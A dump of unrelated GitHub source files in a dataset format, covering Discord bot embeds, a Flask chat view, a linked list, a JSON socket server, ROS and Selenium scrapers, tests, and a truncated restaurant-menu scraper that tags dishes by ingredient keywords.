selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nclass jer_online:\n\n\n\n @classmethod\n def click_and_get_response(cls, url, **kwargs):\n # Note the website need to run in USA to be able to have a good result\n \"\"\"\n url -- type is str\n return list of SeleniumResponse\n \"\"\"\n try:\n from scrapy_balloons.spiders.balloon import config\n from scrapy_balloons.selenium_api import slm_config, driver, balloon_spider\n slm_response = SeleniumResponse(kwargs.get('request'))\n slmStep = SlmStep(slm_config['click'])\n\n driver.get(url)\n time.sleep(slmStep.sleep)\n\n slm.find_element(xpath=\"//select[@id='ddlFOS']/option[@value='1']\").click()\n time.sleep(slmStep.sleep)\n\n slm.find_element(xpath=\"//select[@id='ddlCategory']/option[@value='1']\").click()\n time.sleep(slmStep.sleep)\n\n slm.find_element(id='btnSearch2').click()\n time.sleep(slmStep.sleep)\n\n WebDriverWait(driver, 120).until(EC.invisibility_of_element_located((By.XPATH, \"//div[@id='UpdateProgress1']\")))\n\n time.sleep(slmStep.sleep)\n slm_response.add_html_res(url, driver.page_source.encode('utf-8'))\n except:\n pass\n return slm_response.get_html_res()\n","repo_name":"hoangminhitvn/scraper","sub_path":"scraper-framework/scrapy_balloons/supportclients/jer_online.py","file_name":"jer_online.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"34294744272","text":"class node:\n def __init__(self,data):\n self.data=data\n self.next=None\n self.prev=None\n\nclass dll:\n def __init__(self):\n self.head=None\n def addNodeBeforeValue(self,givenValue,newValue):\n if self.head==None:\n return\n if self.head.data==givenValue:\n newnode=node(newValue)\n newnode.next=self.head\n self.head=newnode\n else:\n curr=self.head\n prev=None\n while curr.data!=givenValue:\n prev=curr\n curr=curr.next\n newnode=node(newValue)\n prev.next=newnode\n newnode.prev=prev\n newnode.next=curr\n curr.prev=newnode\n ","repo_name":"farhan1503001/Data-Structures-203-IUB","sub_path":"Doubly Linked List/addBeforeValue.py","file_name":"addBeforeValue.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"9414280599","text":"\"\"\"\nContains functions related to Discord-specific features, such as embeds.\n\"\"\"\n\n\nimport discord\nimport datetime\nimport time\n\nfrom botforces.utils.constants import (\n NUMBER_OF_ACS,\n USER_WEBSITE_URL,\n PROBLEM_WEBSITE_URL,\n)\nfrom botforces.utils.services import enclose_tags_in_spoilers\n\n\n\"\"\"\nUser embeds.\n\"\"\"\n\n\nasync def create_user_embed(user, author, color):\n \"\"\"\n Creates an embed with user information.\n \"\"\"\n\n Embed = discord.Embed(\n title=user[\"handle\"],\n url=f\"{USER_WEBSITE_URL}{user['handle']}\",\n color=color,\n )\n\n Embed.set_thumbnail(url=user[\"avatar\"])\n\n if \"firstName\" in user and \"lastName\" in user:\n Embed.add_field(\n name=\"Name\",\n value=f\"{user['firstName']} {user['lastName']}\",\n inline=False,\n )\n\n if \"city\" in user and \"country\" in user:\n Embed.add_field(\n name=\"City\",\n value=f\"{user['city']}, {user['country']}\",\n inline=False,\n )\n\n if \"rank\" in user:\n Embed.add_field(\n name=\"Rank\",\n value=user[\"rank\"].title(),\n inline=False,\n )\n else:\n Embed.add_field(name=\"Rank\", value=\"Unranked\", inline=False)\n\n if \"rating\" in user:\n Embed.add_field(\n name=\"Rating\",\n value=user[\"rating\"],\n inline=False,\n )\n\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\n\"\"\"\nProblem embeds.\n\"\"\"\n\n\nasync def create_problem_embed(problem, author):\n \"\"\"\n Creates an embed with problem information.\n \"\"\"\n\n Embed = discord.Embed(\n title=f\"{problem['contestId']}{problem['contestIndex']}. {problem['name']}\",\n url=f\"{PROBLEM_WEBSITE_URL}{problem['contestId']}/{problem['contestIndex']}\",\n color=0xFF0000,\n )\n\n Embed.add_field(name=\"Rating\", value=problem[4], inline=False)\n\n # Printing the tags in spoilers\n if problem[\"tags\"] != \"[]\":\n tags = await enclose_tags_in_spoilers(problem[\"tags\"])\n Embed.add_field(name=\"Tags\", value=tags)\n\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\n\"\"\"\nUpcoming contests embeds.\n\"\"\"\n\n\nasync def create_contest_embed(contestList, author):\n \"\"\"\n Creates an embed with contest information.\n \"\"\"\n\n Embed = discord.Embed(title=\"List of upcoming contests\", color=0xFF0000)\n\n # Adding each contest as a field to the embed\n for contest in contestList:\n\n # Obtaining the start time of the contest\n date = datetime.datetime.fromtimestamp(contest[\"startTimeSeconds\"])\n dateString = date.strftime(\"%b %d, %Y, %H:%M\")\n\n # Obtaining contest duration\n duration = datetime.timedelta(seconds=contest[\"durationSeconds\"])\n hours = duration.seconds // 3600\n minutes = (duration.seconds // 60) % 60\n\n Embed.add_field(\n name=contest[\"name\"],\n value=f\"{contest['id']} - {dateString} {time.tzname[0]} - {hours} hrs, {minutes} mins\",\n inline=False,\n )\n\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\n\"\"\"\nStalk embeds.\n\"\"\"\n\n\nasync def create_submissions_embed(submissions, count, handle, author):\n \"\"\"\n Creates an embed with information about a user's last n solved problems.\n \"\"\"\n\n Embed = discord.Embed(\n title=f\"Last {count} solved by {handle}\",\n description=submissions,\n color=0xFF0000,\n )\n\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\n\"\"\"\nGraph embeds.\n\"\"\"\n\n\nasync def create_rating_plot_embed(handle, author):\n \"\"\"\n Creates an embed with the rating plot of a user.\n \"\"\"\n\n Embed = discord.Embed(\n title=f\"{handle}'s solved problems\",\n description=\"Note: ? refers to problems that do not have a rating on Codeforces.\",\n color=0xFF0000,\n )\n Embed.set_image(url=\"attachment://figure.png\")\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_index_plot_embed(handle, author):\n \"\"\"\n Creates an embed with the index plot of a user.\n \"\"\"\n\n Embed = discord.Embed(title=f\"{handle}'s solved problems\", color=0xFF0000)\n Embed.set_image(url=\"attachment://figure.png\")\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_tags_plot_embed(handle, author):\n \"\"\"\n Creates an embed with the tags plot of a user.\n \"\"\"\n\n Embed = discord.Embed(title=f\"{handle}'s solved problems\", color=0xFF0000)\n Embed.set_image(url=\"attachment://figure.png\")\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\n\"\"\"\nHelp embeds.\n\"\"\"\n\n\nasync def create_general_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use all commands.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"Help Menu\",\n description=\"Type `-help command` to learn about a specific command.\",\n color=0xFF0000,\n )\n\n Embed.add_field(\n name=\"user\", value=\"Displays information about a user.\", inline=False\n )\n Embed.add_field(\n name=\"register\",\n value=\"Stores a mapping between Discord account and Codeforces handle.\",\n inline=False,\n )\n Embed.add_field(\n name=\"unregister\",\n value=\"Removes a mapping between Discord account and Codeforces handle.\",\n inline=False,\n )\n Embed.add_field(\n name=\"stalk\",\n value=\"Displays the last n problems solved by a user.\",\n inline=False,\n )\n Embed.add_field(\n name=\"problem\",\n value=\"Displays a random problem (unsolved by the user if registered).\",\n inline=False,\n )\n Embed.add_field(\n name=\"upcoming\",\n value=\"Displays the list of upcoming Codeforces contests.\",\n inline=False,\n )\n Embed.add_field(\n name=\"duel\",\n value=\"Challenges another user to a duel over a problem.\",\n inline=False,\n )\n Embed.add_field(\n name=\"plotrating\",\n value=\"Plots the problems done by a user, grouped by rating.\",\n inline=False,\n )\n Embed.add_field(\n name=\"plotindex\",\n value=\"Plots the problems done by a user, grouped by contest index.\",\n inline=False,\n )\n Embed.add_field(\n name=\"plottags\",\n value=\"Plots the problems done by a user, grouped by tags.\",\n inline=False,\n )\n\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_user_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use the user command.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"user\", description=\"Displays information about a user.\", color=0xFF0000\n )\n Embed.add_field(name=\"Syntax\", value=\"`-user `\", inline=False)\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_register_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use the register command.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"register\",\n description=\"Stores a mapping between Discord account and Codeforces handle. The Discord account is the one that sent the message.\",\n color=0xFF0000,\n )\n Embed.add_field(\n name=\"Syntax\", value=\"`-register `\", inline=False\n )\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_unregister_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use the unregister command.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"unregister\",\n description=\"Removes a mapping between Discord account and Codeforces handle. The Discord account is the one that sent the message.\",\n color=0xFF0000,\n )\n Embed.add_field(name=\"Syntax\", value=\"`-unregister`\", inline=False)\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_stalk_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use the stalk command.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"stalk\",\n description=f\"Displays the last n problems solved by a user ({NUMBER_OF_ACS} by default).\",\n color=0xFF0000,\n )\n Embed.add_field(\n name=\"Syntax\",\n value=f\"`-stalk ` - Displays last {NUMBER_OF_ACS} submissions of the user\\n`-stalk ` - Displays last n submissions of the user\",\n )\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_problem_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use the problem command.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"problem\",\n description=\"Displays a random problem of optional rating and/or tags (unsolved by the user if registered).\",\n color=0xFF0000,\n )\n Embed.add_field(\n name=\"Syntax\",\n value='`-problem` - Displays a random problem.\\n`-problem ` - Displays a random problem of that rating.\\n`-problem ` - Displays a random problem of those tags (multiple tags are allowed).\\n`-problem ` - Displays a random problem of those tags and rating (order does not matter).\\n\\nNote: For tags like \"binary search\", enclose the tag in double quotes.',\n inline=False,\n )\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_upcoming_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use the upcoming command.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"upcoming\",\n description=\"Displays information about upcoming contests.\",\n color=0xFF0000,\n )\n Embed.add_field(name=\"Syntax\", value=\"`-upcoming`\", inline=False)\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_duel_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use the duel command.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"duel\",\n description=\"Challenges another user to a duel over a problem.\",\n color=0xFF0000,\n )\n Embed.add_field(\n name=\"Syntax\",\n value=\"`-duel @ ` - To challenge a user\\n`-endduel` - To end a duel and decide the result (only if a duel is in progress).\",\n inline=False,\n )\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_plotrating_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use the plotrating command.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"plotrating\",\n description=\"Plots the problems done by a user, grouped by rating.\",\n color=0xFF0000,\n )\n Embed.add_field(\n name=\"Syntax\", value=\"`-plotrating `\", inline=False\n )\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_plotindex_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use the plotindex command.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"plotindex\",\n description=\"Plots the problems done by a user, grouped by contest index.\",\n color=0xFF0000,\n )\n Embed.add_field(\n name=\"Syntax\", value=\"`-plotindex `\", inline=False\n )\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\nasync def create_plottags_help_embed(author):\n \"\"\"\n Displays an embed with instructions on how to use the plottags command.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"plottags\",\n description=\"Plots the problems done by a user, grouped by tags.\",\n color=0xFF0000,\n )\n Embed.add_field(\n name=\"Syntax\", value=\"`-plottags `\", inline=False\n )\n Embed.set_footer(icon_url=author.avatar_url, text=str(author))\n\n return Embed\n\n\n\"\"\"\nDuel embeds.\n\"\"\"\n\n\nasync def create_duel_begin_embed(problem, author, opponent):\n \"\"\"\n Displays an embed with information about the duel.\n \"\"\"\n\n Embed = discord.Embed(\n title=f\"{problem['contestId']}{problem['contestIndex']}. {problem['name']}\",\n url=f\"{PROBLEM_WEBSITE_URL}{problem['contestId']}/{problem['contestIndex']}\",\n description=\"The duel starts now!\",\n color=0xFF0000,\n )\n\n Embed.add_field(name=\"Rating\", value=problem[\"rating\"], inline=False)\n\n # Printing the tags in spoilers\n if problem[\"tags\"] != \"[]\":\n tags = await enclose_tags_in_spoilers(problem[\"tags\"])\n Embed.add_field(name=\"Tags\", value=tags)\n\n Embed.add_field(\n name=\"Duel\",\n value=f\"{author.display_name} vs {opponent.display_name}\",\n inline=False,\n )\n\n return Embed\n\n\nasync def create_duels_embed(duels):\n \"\"\"\n Displays an embed with information about all ongoing duels.\n \"\"\"\n\n Embed = discord.Embed(\n title=\"Ongoing duels\",\n color=0xFF0000,\n )\n\n # Adding fields to embed\n for duel in duels:\n date = datetime.datetime.strptime(\n duel[\"startTime\"], \"%Y-%m-%d %H:%M:%S.%f\"\n ).strftime(\"%b %d, %Y %H:%M:%S\")\n Embed.add_field(\n name=f\"{duel['handle_1']} vs {duel['handle_2']}\",\n value=f\"Problem: {PROBLEM_WEBSITE_URL}{duel['contestId']}/{duel['contestIndex']}\\nStart Time: {date} {time.tzname[0]}\",\n inline=False,\n )\n\n return Embed\n","repo_name":"coniferousdyer/Botforces","sub_path":"botforces/utils/discord_common.py","file_name":"discord_common.py","file_ext":"py","file_size_in_byte":13660,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"15267411184","text":"import socket\nimport json\nimport sys\n\ndata = {\n \"id\": 1234,\n \"name\": \"s3ns3\",\n \"age\": 40\n}\nsend_data = json.dumps(data)\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nhost = ''\nport = 8003\n\ns.bind((host, port))\nprint(\"Socket binded to \" + str(port))\ns.listen(5)\n\nwhile True:\n c, addr = s.accept()\n print(\"Connection from \" + str(addr))\n c.sendall(bytes(send_data, encoding=\"utf-8\"))\n\n buffer = c.recv(1024)\n print(buffer)\n\nc.close()\n","repo_name":"imnirfn/socket-programming-101","sub_path":"lab5/jsonserver.py","file_name":"jsonserver.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73025034749","text":"from flask import (\n Blueprint,\n make_response,\n redirect,\n render_template,\n request,\n Response,\n url_for,\n)\nfrom sqlalchemy import desc\n\nfrom promptly.models import Chat\nfrom promptly.utils import try_parse_int\nfrom .template_filters import human_readable_date\n\nchat_bp = Blueprint('chat', __name__)\nchat_bp.add_app_template_filter(human_readable_date)\n\n\n@chat_bp.route('/', methods=['GET'])\ndef chat_index() -> Response:\n \"\"\"Redirect to the appropriate chat page based on cookie value.\n\n This function checks if a ``chat_id`` exists in cookies and if so,\n redirects the user to that specific chat page. Otherwise, a new chat page\n is rendered.\n\n :return: Redirect response or a call to :func:`.chat` function.\n :rtype: flask.Response\n \"\"\"\n chat_id = try_parse_int(request.cookies.get('chat_id'))\n if chat_id and Chat.exists(chat_id):\n return redirect(url_for('chat.chat', chat_id=chat_id))\n\n return chat()\n\n\n@chat_bp.route('/', methods=['GET'])\ndef chat(chat_id=None) -> Response:\n \"\"\"Render the chat page of the application.\n\n :param int chat_id: The ID of the chat. If not exists, a new chat is\n created.\n :return: The rendered chat page template.\n :rtype: flask.Response\n \"\"\"\n chat_instance = Chat.get(chat_id)\n if not chat_instance:\n chat_instance = Chat.create_new_chat()\n\n template = render_template(\n 'chat/chat.html',\n chat=chat_instance,\n )\n resp = make_response(template)\n resp.set_cookie('chat_id', str(chat_instance.id))\n return resp\n\n\n@chat_bp.route('/history', methods=['GET'])\ndef history() -> str:\n \"\"\"Render the chat history page of the application.\n\n :return: The rendered chat history template.\n :rtype: str\n \"\"\"\n chats = Chat.query.order_by(desc(Chat.created_at)).all()\n return render_template('chat/history.html', chats=chats)\n","repo_name":"sergeyklay/promptly","sub_path":"backend/promptly/chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"70321406907","text":"import numpy as np\nfrom scipy.misc import imread, imsave, imresize\nfrom os import listdir\nimport scipy.fftpack\n\n\ndef list_files(directory, extension):\n return (f for f in listdir(directory) if f.endswith('.' + extension))\n\n\ndef write_files():\n raw_image_file_names = list_files(\"../Dataset_V02/Training/\", \"png\")\n i = 0\n for file_name in raw_image_file_names:\n i += 1\n img = imread(\"../Dataset_V02/Training/\" + file_name)\n img = imresize(img, [200, 400])\n imsave(\"../Resized_Dataset_V02/Training/\" + file_name, img)\n if i % 20 == 0:\n print(\"image\", str(i), \"processed\")\n\n\ndef main():\n write_files()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"lorenz-h/DataRepresentationLearning","sub_path":"Old Experiments/Juli/DuckieLanesV2/Utilities/DL_Generate_Downscaled_Dataset.py","file_name":"DL_Generate_Downscaled_Dataset.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"41068852952","text":"from collections import defaultdict\nfrom os import path\nfrom pprint import pprint as pp\n\nwith open('input/12.in', 'r') as in_file:\n lines = list(map(str.strip, in_file.readlines()))\n link = defaultdict(list)\n for line in lines:\n fr, to = line.split('-')\n link[fr].append(to)\n link[to].append(fr)\n\nprint(link)\n\n\ndef dfs(start, visited: set = {'start'}, doneTwice: bool = False, current_path=[]):\n if start == 'end':\n return [current_path + [start]]\n\n paths = []\n\n for node in link[start]:\n if node == 'start':\n continue\n\n if node in visited and doneTwice:\n continue\n\n newDoneTwice = doneTwice or node in visited\n\n new_visted = visited.union({start}) if start[0].islower() else visited\n paths += dfs(node,\n visited=new_visted,\n doneTwice=newDoneTwice,\n current_path=current_path + [start])\n\n return paths\n\n\npaths = dfs('start')\nprint(len(paths))","repo_name":"vasylenson/aoc-2021","sub_path":"python/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8764169512","text":"import pytest\n\nfrom mel.scanning.stream import CharStream\n\n\n# BEGIN TESTS ==================================\n\ndef test_empty_text_is_eof():\n stream = CharStream()\n assert stream.get().is_eof()\n\n\ndef test_empty_text_has_zero_length():\n stream = CharStream()\n assert len(stream) == 0\n\n\ndef test_stream_length():\n stream = CharStream('abc')\n assert len(stream) == 3\n\n\ndef test_empty_text_char_type():\n stream = CharStream()\n assert stream.get().is_eof()\n\n\n@pytest.mark.parametrize('test_input, method', [\n ('a', 'is_lower'),\n ('h', 'is_lower'),\n ('z', 'is_lower'),\n ('A', 'is_upper'),\n ('M', 'is_upper'),\n ('Z', 'is_upper'),\n ('0', 'is_digit'),\n ('1', 'is_digit'),\n ('5', 'is_digit'),\n ('9', 'is_digit'),\n (' ', 'is_space'),\n ('\\t', 'is_space'),\n ('\\a', 'is_space'),\n ('\\b', 'is_space'),\n ('\\v', 'is_space'),\n ('\\r', 'is_space'),\n ('%', 'is_symbol'),\n ('*', 'is_symbol'),\n ('_', 'is_symbol'),\n ('\"', 'is_symbol'),\n ('\\n', 'is_newline'),\n ('é', 'is_other'),\n ('ó', 'is_other'),\n ('¨', 'is_other'),\n ('£', 'is_other'),\n ('ã', 'is_other')\n])\ndef test_char_type(test_input, method):\n stream = CharStream(test_input)\n ch = stream.get()\n assert getattr(ch, method)()\n\n\ndef test_char_line():\n text = 'ab\\nc\\n\\nd'\n stream = CharStream(text)\n lines = [stream.get(i).line for i, _ in enumerate(text)]\n assert lines == [0, 0, 0, 1, 1, 2, 3]\n\n\ndef test_char_column():\n text = 'ab\\nc\\n\\nd'\n stream = CharStream(text)\n lines = [stream.get(i).column for i, _ in enumerate(text)]\n assert lines == [0, 1, 2, 0, 1, 0, 0]\n\n\ndef test_char_values():\n text = 'i76hj-'\n stream = CharStream(text)\n values = ''.join([\n stream.get(i).value\n for i, _ in enumerate(text)\n ])\n assert values == text\n\n\ndef test_is_next_char():\n stream = CharStream('a3')\n assert stream.get(0).value == 'a'\n assert not stream.get(1).value == 'C'\n assert stream.get(1).value == '3'\n","repo_name":"hacktoon/mel","sub_path":"tests/scanning/test_stream.py","file_name":"test_stream.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"23399894502","text":"import nextcord\r\nfrom nextcord.ext import commands\r\nfrom nextcord import Interaction, ButtonStyle\r\nfrom nextcord.ui import Button, View\r\n\r\nfrom config.config_handler import ConfigHandler\r\nfrom components.embeds.help_embed import CreateHelpEmbed\r\n\r\nclass Help(commands.Cog):\r\n\r\n config_handler = ConfigHandler()\r\n \r\n def __init__(self, bot: commands.Bot):\r\n self.bot = bot\r\n \r\n @nextcord.slash_command(\r\n name = \"help\",\r\n description = \"ЁЯФи Obten ayuda sobre mis comandos\",\r\n guild_ids = config_handler.get_CaC_server_id()\r\n )\r\n \r\n async def invite_command(self, ctx: Interaction):\r\n \r\n currentPage = 0\r\n \r\n nextButton = Button(label = \"тПня╕П\", style = ButtonStyle.blurple)\r\n previousButton = Button(label = \"тПоя╕П\", style = ButtonStyle.blurple)\r\n \r\n async def next_callback(interaction):\r\n nonlocal currentPage, send\r\n currentPage += 1\r\n \r\n await send.edit(embed = CreateHelpEmbed(pagNum = currentPage), view=helpView)\r\n \r\n async def previous_callback(interaction):\r\n nonlocal currentPage, send\r\n currentPage -= 1\r\n \r\n await send.edit(embed = CreateHelpEmbed(pagNum = currentPage), view=helpView)\r\n \r\n nextButton.callback = next_callback\r\n previousButton.callback = previous_callback\r\n \r\n helpView = View(timeout = 300)\r\n helpView.add_item(previousButton)\r\n helpView.add_item(nextButton)\r\n \r\n \r\n send = await ctx.response.send_message(embed = CreateHelpEmbed(pagNum=0), view=helpView)\r\n \r\ndef setup(client):\r\n client.add_cog(Help(client))","repo_name":"Worcer/ASF","sub_path":"amanecer sin fronteras/src/commands/info/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"6626445234","text":"horas = input().split(\" \")\n\na, b = horas\n\nif int(a) >= int(b):\n b = int(b) + 24\n dur = int(b) - int(a)\n print(\"O JOGO DUROU {} HORA(S)\".format(int(dur)))\nelse:\n dur = int(a) - int(b)\n dur = abs(dur)\n print(\"O JOGO DUROU {} HORA(S)\".format(int(dur)))","repo_name":"jonathasfsilva/python","sub_path":"uri-exercises/1046_tempo_jogo.py","file_name":"1046_tempo_jogo.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"37579938981","text":"#!/usr/bin/env python\n# license removed for brevity\nimport rospy\nfrom std_msgs.msg import String\n\n\ndef main_baxter_display():\n pub1 = rospy.Publisher('/launch_display', String, queue_size=100)\n \n rospy.init_node('main_publisher', anonymous=True)\n rate = rospy.Rate(100) # 10hz\n rate.sleep()\n print(\"hello\")\n while not rospy.is_shutdown():\n pub1.publish('/home/bashira/catkin_ws/baxterworking_text.jpg')\n\n # rospy.spin()\n rate.sleep()\n # if __name__ == '__main__':\n # try:\n # talker()\n # except rospy.ROSInterruptException:\n # pass\n\n\n","repo_name":"anima-unr/Distributed_Collaborative_Task_Tree_GA_learning_executing","sub_path":"launching_file_from_web/src/publishing_command_display.py","file_name":"publishing_command_display.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25792918502","text":"from bs4 import BeautifulSoup;\nimport regex as re;\nimport xlsxwriter;\nfrom openpyxl import load_workbook;\nfrom selenium import webdriver;\nfrom selenium.webdriver.support.ui import WebDriverWait as wait\nimport dishcategorizer\nimport random;\nimport addrestaurantstosheet\n\n# This parses menu sites written in javascript by using marionette browsers. Download gecko and place it in the same path as me.\n# 3/27/2019\n\n#########################################################################\n\n# if you leave these blank the console will just ask you to input them. Do whichever you feel like\nurlList = []\nworkbookName = \"\"\n\n\n#########################################################################\n\n##Soup functions\ndef getAddress(soup):\n address = \"\"\n for s in soup:\n if s.p:\n address = s.p.text\n # TODO: Make this more flexible\n if 'NW' in address or 'SW' in address or \"Northwest\" in address or \"Street\" in address or \"ave\" in address:\n return address\n try:\n address = soup.p\n except:\n print('fail')\n pass\n\n return 'Address not found!'\n\n\ndef getType(dishCategory):\n dishType = dishCategory.findAll(class_=\"category-name\")\n return dishType\n\n\ndef getNames(dishCategory):\n dishNames1 = dishCategory.findAll('span', itemprop='name')\n # crams all the cleaning in one line, fuck readability\n dishNames = [dish.text.split(\"(\")[0] for dish in dishNames1]\n return dishNames\n\n\ndef getDescriptions(dishCategory):\n dishDescriptions1 = dishCategory.findAll('meta', itemprop='description')\n dishDescriptions = [x['content'] for x in dishDescriptions1]\n return dishDescriptions\n\n\n# Regex Functions\ndef makeItRegEx(aList):\n regExList = []\n for word in aList:\n regExList.append(word)\n return \"|\".join(regExList)\n\n\ndef stripText(text):\n text = \" \".join(text.split(\",\"))\n text = \" \".join(text.split('.'))\n text = \" \".join(text.split('('))\n text = \" \".join(text.split(')'))\n text = \" \".join(text.split('\"'))\n text = \" \".join(text.split('-'))\n text = \" \".join(text.split(':')).lower()\n return text\n\n\ndef plantCatcher(dishDescription):\n try:\n dishDescription1 = dishDescription.string.lower().strip()\n except:\n dishDescription1 = dishDescription.lower().strip()\n\n dishDescription1 = stripText(dishDescription1)\n veggieWords = [\"vegan\", \"veggie\", \"vegetarian\", \"soy\", \"choice of\", \"faux\", \"plant\"]\n vegan = re.findall(makeItRegEx(veggieWords), dishDescription1)\n if vegan:\n return vegan[0]\n\n\ndef veganCatcher(dishDescription):\n try:\n dishDescription1 = dishDescription.string.lower().strip()\n except:\n dishDescription1 = dishDescription.lower().strip()\n\n dishDescription1 = stripText(dishDescription1)\n\n dairyWords = [\"cheese\", \"cream\", \"butter\", \"cheese\", \"parmesan\", \"cheddar\", \"mozzarella\", \"ricotta\", \"feta\"]\n eggsWords = [\"egg\", \"omelette\", \"meringue\", \"yolk\"]\n otherWords = [\"honey\"]\n dairy = re.findall(makeItRegEx(dairyWords), dishDescription1)\n eggs = re.findall(makeItRegEx(eggsWords), dishDescription1)\n honey = re.findall(makeItRegEx(otherWords), dishDescription1)\n if dairy:\n return dairy[0]\n elif eggs:\n return eggs[0]\n elif honey:\n return honey[0]\n\n\ndef meatCatcher(dishDescription):\n try:\n dishDescription1 = dishDescription.string\n except:\n dishDescription1 = dishDescription\n\n dishDescription1 = stripText(dishDescription1)\n\n chickenWords = ['chicken', 'breast', 'leg', 'thigh', 'drumstick', 'wing']\n cowWords = ['beef', 'steak', 'sausage', 'rib', 'veal']\n pigWords = ['pig', 'pork', 'ham', 'bacon', 'veal', 'prosciutto', 'pancetta', 'boar']\n seaWords = [\"bass\", \"fish\", \"seafood\", \"clams\", \"mussel\", \"lobster\", \"octopus\", \"squid\", \"calamari\", \"scallop\",\n \"shrimp\", \"salmon\", \"prawn\", \"crab\", \"eel\", \"tuna\", \"mackerel\", \"mackrel\"]\n otherWords = [\"bison\", \"meat\", \"lamb\", \"turkey\", \"quail\", \"rabbit\", \"venison\", \"duck\", \"pepperoni\"]\n\n chicken = re.findall(makeItRegEx(chickenWords), dishDescription1)\n cow = re.findall(makeItRegEx(cowWords), dishDescription1)\n pig = re.findall(makeItRegEx(pigWords), dishDescription1)\n sea = re.findall(makeItRegEx(seaWords), dishDescription1)\n other = re.findall(makeItRegEx(otherWords), dishDescription1)\n\n if chicken:\n return chicken[0]\n elif pig:\n return pig[0]\n elif cow:\n return cow[0]\n elif sea:\n return sea[0]\n elif other:\n return other[0]\n\n\ndef glutenCatcher(websiteText):\n dishDescription1 = ''.join(websiteText.findAll(text=True)).strip()\n dishDescription1 = stripText(dishDescription1)\n gluten = re.search(r'\\bgluten\\b', dishDescription1)\n # we now try to find the 50 chars before, after the word \"gluten\" to give it some context - are there really gluten free options?\n\n if gluten:\n n = (gluten.start())\n m = n - 50\n z = n + 150\n\n glutenContext = dishDescription1[m:z]\n dishDescription1.split()\n return glutenContext\n else:\n return False\n\n\n# Code begins #\nif workbookName == \"\":\n workbookName = input(\"Enter workbook name (including .xlsx): \")\nuserInput = \"\"\nyes = \"y\"\nif not urlList:\n while userInput.lower() != \"ok\":\n userInput = input(\"Paste a Skip restaurant URL (enter 'ok' when done): \")\n if \"http\" in userInput:\n urlList.append(userInput)\n\ntry:\n load_workbook(filename=workbookName)\n yes = input(\"This workbook already exists. Overwrite? (y/n)): \")\n\nexcept:\n if yes == \"y\":\n pass\n else:\n raise\n input(\"Aborting mission! Enter any key to 